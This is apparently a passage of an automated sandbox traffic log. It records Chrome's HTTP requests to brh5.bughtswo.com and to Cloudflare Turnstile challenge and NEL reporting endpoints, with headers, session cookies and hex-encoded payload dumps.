                                                            Data Ascii: CPihORmRgNEZ2bjZnVDt/Z3xTNFSFPGNoYEdnS16MaYp4fnyOalFua4eQbGtcjItocHl7YZmEkaV6k32Wlq15q5qZpKescqVvormiiKu5sZWtu7uZeriTnbXElaGCv47EurmNjq6ntrK3lsLMzdCv39LNoJ2jvNi1pd7g3qLV5eOoscXgzt3ptLjo1trMxvjv8t3gz/bxCNHa0eT7AAUL+gDNDwYM9AcBD/oT9+vY+A8iDvEV2iUnKAYrFhouJ/
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 4c 56 52 42 51 30 5a 78 53 56 64 71 56 6e 56 63 64 57 51 39 67 48 39 59 68 30 61 44 57 49 53 49 68 33 64 6a 68 31 39 74 61 4a 42 68 63 6c 56 74 6c 33 78 54 54 34 64 34 58 47 31 5a 6b 4a 39 6c 6b 4a 39 37 6d 61 43 72 6a 4b 35 71 66 6f 53 6a 6f 59 57 30 64 62 57 6f 72 59 74 79 63 71 31 39 75 62 79 68 6b 4c 57 6b 72 5a 71 79 75 5a 7a 48 74 35 6e 48 6d 5a 71 71 6d 4c 6e 52 70 71 4f 4c 74 61 69 52 79 70 44 62 79 5a 65 78 7a 73 7a 4c 34 64 71 69 34 39 32 6a 75 73 4c 53 71 71 50 71 33 65 6e 44 7a 75 62 7a 31 4d 44 49 78 4d 72 51 2b 4e 6d 33 32 64 44 58 37 76 48 41 34 2f 58 52 76 51 4f 2f 41 2f 66 6c 31 77 34 41 44 65 54 2b 43 4f 38 4b 45 75 58 7a 31 42 55 5a 42 64 49 47 39 68 34 42 47 43 54 63 37 2b 30 50 4a 51 62 39 39 51 62 36 35 77 45 47 4c 42 44 6b 4c 2f 41
                                                            Data Ascii: LVRBQ0ZxSVdqVnVcdWQ9gH9Yh0aDWISIh3djh19taJBhclVtl3xTT4d4XG1ZkJ9lkJ97maCrjK5qfoSjoYW0dbWorYtycq19ubyhkLWkrZqyuZzHt5nHmZqqmLnRpqOLtaiRypDbyZexzszL4dqi492jusLSqqPq3enDzubz1MDIxMrQ+Nm32dDX7vHA4/XRvQO/A/fl1w4ADeT+CO8KEuXz1BUZBdIG9h4BGCTc7+0PJQb99Qb65wEGLBDkL/A
                                                            2025-01-07 20:28:57 UTC1369INData Raw: 31 5a 30 61 6c 5a 62 62 48 71 46 5a 49 56 48 56 6d 4f 42 58 45 70 71 66 58 70 38 65 30 52 6b 68 31 53 58 68 58 57 58 5a 33 56 79 69 4a 46 70 64 6e 4f 69 6f 59 56 33 63 57 4b 43 66 34 42 71 6e 71 6d 69 62 36 53 45 69 59 79 69 73 4b 75 49 73 49 6d 51 6c 37 61 33 73 35 36 65 6b 6f 71 61 77 72 53 34 6b 35 44 42 69 70 2f 46 69 5a 61 77 72 38 47 2f 70 73 4c 52 6f 74 47 70 75 72 69 73 74 4b 66 63 75 4c 2f 68 71 72 36 67 34 36 61 6d 30 64 6a 45 78 63 50 57 74 73 6e 4f 37 75 2f 78 76 4f 50 43 72 73 54 72 75 75 58 73 2b 75 37 32 38 72 6d 34 38 65 7a 4e 35 66 4c 37 77 41 72 33 42 41 37 61 43 42 44 72 38 75 45 48 44 75 7a 33 44 64 58 4d 42 68 54 5a 38 42 45 66 2b 2f 7a 77 48 41 51 66 35 66 30 67 4b 51 4d 71 44 53 72 72 43 68 2f 72 43 69 6f 42 36 4f 6b 55 2b 41 38 71
                                                            Data Ascii: 1Z0alZbbHqFZIVHVmOBXEpqfXp8e0Rkh1SXhXWXZ3VyiJFpdnOioYV3cWKCf4Bqnqmib6SEiYyisKuIsImQl7a3s56ekoqawrS4k5DBip/FiZawr8G/psLRotGpuristKfcuL/hqr6g46am0djExcPWtsnO7u/xvOPCrsTruuXs+u728rm48ezN5fL7wAr3BA7aCBDr8uEHDuz3DdXMBhTZ8BEf+/zwHAQf5f0gKQMqDSrrCh/rCioB6OkU+A8q


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            14192.168.2.1649722188.114.96.34436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:57 UTC1318OUTGET /favicon.ico HTTP/1.1
                                                            Host: brh5.bughtswo.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://brh5.bughtswo.com/tgs0/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Cookie: XSRF-TOKEN=eyJpdiI6IjFLd2JQN09KbXFub0ZsYkZJcnBSYlE9PSIsInZhbHVlIjoiamNwVjNoNVRIU1RVbmxoZDJ2OEl2RlNuSldibmJKZWhFRFRQWmpCU2w3bEY3NndFaFZjYlZkZXZEYW1WY2o1aEpjb1IyV2RyS0x6c1phY2RweXY2VnRxT2R4RENRMEU1TjFDZ1ZZU3RQRGkxcmN1M2pwL2xwK1VLZ2MwV2FBUzkiLCJtYWMiOiIyNjBkZjFkY2ZkNzdkYmFmMzBhMzk4M2E5YzA2MGJjYTBhZTEyNzFlZmUzZDk5YzYwYWY1N2ZiM2VmYTNlYzE2IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IlF2VFZvbWZUQWFUcWhqN1JpNlloS3c9PSIsInZhbHVlIjoicnBPVmtmSHdSNUhZRk02Q29IVnRmR2h2VmdPSVpwcnZGbWZQODd2dVZNcWhkTGI5dWg5a2ZRQk51OGpvU3VRRlY4R2VHRTUrb0VaNnFBaWtnUEdCVUw1OGVnamFqV0VXanBJRGJYVzI4WEU1aFFCWHFNcitMbitRTG5FK2ZQdzIiLCJtYWMiOiI1MmUwMWRkMzUxODhjYTM4ZWMxNDUxZDA1NzUxMzZiMjVmZjBiNjQxYzU5ZmY4YWJiZTdhODI3NmY4MTM4MTJiIiwidGFnIjoiIn0%3D
                                                            2025-01-07 20:28:58 UTC1074INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 20:28:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Cache-Control: max-age=14400
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bhIT4pwb%2Fhz3uzY%2FX8QmdMbB22YUeA3v3xYWP%2F2S0pqLFrjc3hfi8qtmtxzGHPC1olWrunLgx8pfKqpY%2BUjACS0zDaMBtsDCilKZGc8UZ3pJd%2FI%2FSX0TCBzWcpDKYg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Vary: Accept-Encoding
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=74620&min_rtt=74601&rtt_var=28014&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2283&delivery_rate=38096&cwnd=32&unsent_bytes=0&cid=6c5b5273f656170c&ts=425&x=0"
                                                            CF-Cache-Status: HIT
                                                            Age: 3418
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b27e3e1043c7-EWR
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1853&min_rtt=1837&rtt_var=700&sent=3&recv=6&lost=0&retrans=0&sent_bytes=2826&recv_bytes=1896&delivery_rate=1589548&cwnd=215&unsent_bytes=0&cid=7f11eecf3ff66976&ts=135&x=0"
                                                            2025-01-07 20:28:58 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            15192.168.2.1649723104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:58 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:58 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 20:28:58 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            cf-chl-out: 2OHA2MBoHuMIkRCSwTA7X3faAaNF+1hBVsk=$yVjMVlBcy+xXcYNb
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2820e2a7cf4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:58 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            16192.168.2.164972435.190.80.14436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:58 UTC542OUTOPTIONS /report/v4?s=bhIT4pwb%2Fhz3uzY%2FX8QmdMbB22YUeA3v3xYWP%2F2S0pqLFrjc3hfi8qtmtxzGHPC1olWrunLgx8pfKqpY%2BUjACS0zDaMBtsDCilKZGc8UZ3pJd%2FI%2FSX0TCBzWcpDKYg%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Origin: https://brh5.bughtswo.com
                                                            Access-Control-Request-Method: POST
                                                            Access-Control-Request-Headers: content-type
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:58 UTC336INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            access-control-max-age: 86400
                                                            access-control-allow-methods: OPTIONS, POST
                                                            access-control-allow-origin: *
                                                            access-control-allow-headers: content-type, content-length
                                                            date: Tue, 07 Jan 2025 20:28:58 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            17192.168.2.1649725104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:58 UTC782OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6b271e95a19cb/1736281737628/GROo7OGaIxf9AFr HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: no-cors
                                                            Sec-Fetch-Dest: image
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:58 UTC200INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:58 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b283db97438b-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:58 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 32 08 02 00 00 00 6d 48 34 2c 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR;2mH4,IDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            18192.168.2.164972835.190.80.14436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:59 UTC482OUTPOST /report/v4?s=bhIT4pwb%2Fhz3uzY%2FX8QmdMbB22YUeA3v3xYWP%2F2S0pqLFrjc3hfi8qtmtxzGHPC1olWrunLgx8pfKqpY%2BUjACS0zDaMBtsDCilKZGc8UZ3pJd%2FI%2FSX0TCBzWcpDKYg%3D%3D HTTP/1.1
                                                            Host: a.nel.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 429
                                                            Content-Type: application/reports+json
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:59 UTC429OUTData Raw: 5b 7b 22 61 67 65 22 3a 31 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 30 35 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 62 72 68 35 2e 62 75 67 68 74 73 77 6f 2e 63 6f 6d 2f 74 67 73 30 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                            Data Ascii: [{"age":1,"body":{"elapsed_time":1054,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://brh5.bughtswo.com/tgs0/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-error",
                                                            2025-01-07 20:28:59 UTC168INHTTP/1.1 200 OK
                                                            Content-Length: 0
                                                            date: Tue, 07 Jan 2025 20:28:59 GMT
                                                            Via: 1.1 google
                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            19192.168.2.1649730104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:28:59 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8fe6b271e95a19cb/1736281737628/GROo7OGaIxf9AFr HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:28:59 UTC200INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:28:59 GMT
                                                            Content-Type: image/png
                                                            Content-Length: 61
                                                            Connection: close
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b287acc40c86-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:28:59 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 3b 00 00 00 32 08 02 00 00 00 6d 48 34 2c 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                            Data Ascii: PNGIHDR;2mH4,IDAT$IENDB`


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            20192.168.2.1649732104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:00 UTC811OUTGET /cdn-cgi/challenge-platform/h/g/pat/8fe6b271e95a19cb/1736281737635/e234ea1a2e5430358f39da8ac16e3e4488ad77ca8eba26846c92181526c2edd2/0bF9m1t3aVUBprf HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Cache-Control: max-age=0
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:00 UTC143INHTTP/1.1 401 Unauthorized
                                                            Date: Tue, 07 Jan 2025 20:29:00 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 1
                                                            Connection: close
                                                            2025-01-07 20:29:00 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 34 6a 54 71 47 69 35 55 4d 44 57 50 4f 64 71 4b 77 57 34 2d 52 49 69 74 64 38 71 4f 75 69 61 45 62 4a 49 59 46 53 62 43 37 64 49 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                            Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g4jTqGi5UMDWPOdqKwW4-RIitd8qOuiaEbJIYFSbC7dIAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                            2025-01-07 20:29:00 UTC1INData Raw: 4a
                                                            Data Ascii: J


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            21192.168.2.1649733104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:00 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            Content-Length: 32903
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            Content-type: application/x-www-form-urlencoded
                                                            CF-Chl-RetryAttempt: 0
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            CF-Challenge: b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://challenges.cloudflare.com
                                                            Sec-Fetch-Site: same-origin
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv/7vyul/0x4AAAAAAAxHfCcO_DpISAPE/auto/fbE/normal/auto/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:00 UTC16384OUTData Raw: 76 5f 38 66 65 36 62 32 37 31 65 39 35 61 31 39 63 62 3d 77 4e 78 53 34 4a 6b 57 76 4a 76 42 78 42 41 6b 6a 46 78 53 5a 78 4d 70 75 56 24 76 4d 33 4e 6e 38 66 6e 73 38 56 36 57 6e 68 6e 50 50 6b 33 50 6e 52 72 4a 53 39 50 36 4b 6b 36 6e 72 63 38 6e 72 48 6e 67 67 43 39 53 7a 6e 64 50 42 51 77 6e 6e 45 50 50 76 53 77 78 6b 46 38 25 32 62 53 42 74 6e 77 43 69 53 6e 36 6e 36 55 61 6d 6e 78 39 6e 2d 71 71 64 61 50 6e 35 41 4f 50 6e 45 4a 6a 70 63 38 50 47 53 77 76 53 4c 53 53 36 39 6b 35 6e 6b 57 6e 4a 63 72 6e 32 45 48 66 50 32 67 74 4b 71 2d 53 33 78 43 76 53 6e 6f 6b 4b 64 48 53 53 77 46 41 6e 4d 41 6a 70 6c 76 4c 6e 6e 63 38 6e 6e 70 34 5a 75 46 4a 49 6e 50 72 6c 72 46 41 2d 69 59 48 53 54 45 32 48 33 46 57 52 54 6d 4c 6d 77 35 6b 65 74 64 4d 58 54 49 73
                                                            Data Ascii: v_8fe6b271e95a19cb=wNxS4JkWvJvBxBAkjFxSZxMpuV$vM3Nn8fns8V6WnhnPPk3PnRrJS9P6Kk6nrc8nrHnggC9SzndPBQwnnEPPvSwxkF8%2bSBtnwCiSn6n6Uamnx9n-qqdaPn5AOPnEJjpc8PGSwvSLSS69k5nkWnJcrn2EHfP2gtKq-S3xCvSnokKdHSSwFAnMAjplvLnnc8nnp4ZuFJInPrlrFA-iYHSTE2H3FWRTmLmw5ketdMXTIs
                                                            2025-01-07 20:29:00 UTC16384OUTData Raw: 37 36 79 50 59 24 6b 6e 47 30 61 30 59 6e 6b 4e 43 56 6b 72 6e 51 6e 2b 50 71 78 4a 39 6e 43 53 71 33 42 44 6e 32 50 4a 50 42 55 6e 43 53 4a 4c 6e 4b 6e 61 53 72 72 6b 39 50 2b 34 6b 56 6e 48 6e 66 6e 6e 47 53 44 6e 61 6e 6b 33 6b 72 6e 59 53 71 57 6e 65 6e 37 4f 6f 57 6b 24 6e 4d 72 6e 47 34 4d 39 72 53 77 78 6b 73 6e 4a 53 41 56 6e 6a 6e 52 53 46 76 6b 50 6e 61 53 64 76 42 6c 53 38 53 4d 39 6e 73 6e 47 53 64 39 6e 53 6e 47 41 4a 57 42 55 6e 4e 53 36 79 42 6c 53 41 53 78 75 6b 53 6b 32 50 46 70 4a 37 50 75 4e 6b 69 6b 66 37 4a 39 64 30 62 78 6e 66 6e 51 50 4a 4c 6e 4c 6e 41 76 4a 7a 6e 76 6e 52 56 6b 37 6e 79 53 78 76 4a 33 6e 63 6e 5a 39 42 52 6e 48 6e 47 56 4a 48 6e 48 53 72 78 4a 44 50 69 6e 44 78 42 59 6e 32 53 51 76 6e 52 6e 2b 4e 46 52 4a 75 6b 2d
                                                            Data Ascii: 76yPY$knG0a0YnkNCVkrnQn+PqxJ9nCSq3BDn2PJPBUnCSJLnKnaSrrk9P+4kVnHnfnnGSDnank3krnYSqWnen7OoWk$nMrnG4M9rSwxksnJSAVnjnRSFvkPnaSdvBlS8SM9nsnGSd9nSnGAJWBUnNS6yBlSASxukSk2PFpJ7PuNkikf7J9d0bxnfnQPJLnLnAvJznvnRVk7nySxvJ3ncnZ9BRnHnGVJHnHSrxJDPinDxBYn2SQvnRn+NFRJuk-
                                                            2025-01-07 20:29:00 UTC135OUTData Raw: 6e 4a 46 6f 79 45 76 50 4d 77 46 58 6e 56 45 6c 58 54 70 4c 55 58 65 6e 6e 6f 6e 47 56 45 36 4f 61 49 32 76 51 78 6e 42 79 7a 53 24 37 77 2d 49 7a 53 5a 76 6b 78 6f 47 76 42 6e 42 30 44 43 53 6b 24 68 68 6e 79 53 51 78 52 56 59 32 75 38 50 6b 66 53 37 56 55 5a 2d 24 50 64 6e 24 45 52 49 7a 55 77 4d 76 32 49 50 77 32 5a 36 2b 76 56 43 70 4f 36 66 41 2b 55 51 42 79 6e 56 53 64 4d 62 4a 77 65 37 50 6e 6e
                                                            Data Ascii: nJFoyEvPMwFXnVElXTpLUXennonGVE6OaI2vQxnByzS$7w-IzSZvkxoGvBnB0DCSk$hhnySQxRVY2u8PkfS7VUZ-$Pdn$ERIzUwMv2IPw2Z6+vVCpO6fA+UQBynVSdMbJwe7Pnn
                                                            2025-01-07 20:29:01 UTC318INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:29:01 GMT
                                                            Content-Type: text/plain; charset=UTF-8
                                                            Content-Length: 26284
                                                            Connection: close
                                                            cf-chl-gen: pDLI3+PpyEPvKR+tmytswQDJOOx5XDTmEznvYt92C5TczHXhYyuwimPDtBaExN12lWk=$h7Tr+4gXDR1Xpzjm
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2906cce4276-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:29:01 UTC1051INData Raw: 59 34 56 74 65 57 78 2b 59 34 5a 54 62 46 61 51 55 58 6c 35 57 58 6d 67 62 32 31 5a 64 31 35 78 58 58 79 56 68 4b 6d 41 68 35 70 6e 5a 36 42 2b 6b 58 2b 67 72 6d 32 4c 73 61 78 32 74 6e 79 75 75 35 6d 63 6a 62 71 6b 67 62 57 36 6d 5a 4b 2f 76 34 65 2b 74 63 2b 38 73 4b 53 2b 6f 59 7a 56 77 34 32 6c 73 73 53 57 6d 37 43 63 6b 5a 65 34 75 74 66 69 70 64 36 32 34 72 4f 37 32 74 57 72 74 38 7a 67 33 71 6a 66 36 4c 4c 50 36 2b 61 33 30 64 57 37 33 72 6a 78 33 76 48 78 33 4f 44 36 30 77 58 6f 38 74 6b 4d 39 76 7a 62 44 2f 6a 38 36 77 77 41 30 2b 4d 58 41 77 72 61 2b 41 6e 5a 48 68 7a 33 45 76 33 77 41 2f 77 62 42 2f 62 6f 4b 43 6f 69 44 41 73 4c 37 53 67 4c 4b 42 51 48 4e 44 49 49 42 6a 6e 35 2b 68 77 37 4f 54 33 35 47 69 49 76 2b 77 54 39 47 43 55 55 48 43 31
                                                            Data Ascii: Y4VteWx+Y4ZTbFaQUXl5WXmgb21Zd15xXXyVhKmAh5pnZ6B+kX+grm2Lsax2tnyuu5mcjbqkgbW6mZK/v4e+tc+8sKS+oYzVw42lssSWm7CckZe4utfipd624rO72tWrt8zg3qjf6LLP6+a30dW73rjx3vHx3OD60wXo8tkM9vzbD/j86wwA0+MXAwra+AnZHhz3Ev3wA/wbB/boKCoiDAsL7SgLKBQHNDIIBjn5+hw7OT35GiIv+wT9GCUUHC1
